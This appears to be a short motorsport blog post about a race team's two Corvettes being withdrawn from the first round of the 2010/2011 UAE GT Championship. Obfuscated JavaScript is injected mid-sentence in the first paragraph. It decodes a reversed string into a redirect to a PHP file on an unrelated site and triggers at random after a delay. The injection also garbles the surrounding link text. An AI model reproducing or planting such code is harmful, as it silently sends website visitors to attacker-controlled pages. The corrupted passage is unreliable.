The TAM Auto Engineering / House of Portier race team were hoping to kick off the 2010/2011 CYTECH UAE GT Championship with a win in both GTA and GTB with their pair of orange ‘Vettes. Unfortunately, $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/20103134/house-of-portier-tam-auto-engineering-uae-gts-round-1/”>an incident with the GTA car in pre testing saw both cars withdrawn from the race for safety’s sake. However, the assembled driving talents of Karim Al Azhari, Fabien Giroix, Mohammed Al Mutawaa and Jiri Skula still managed to get some decent seat time in both cars.
Naturally, the PistonClash crew were on hand to capture all the action from the race, and the result of the weekend can be seen below. Be sure to keep a look out for more videos throughout the season as we follow the reigning champions in their attack on this year’s silverware.
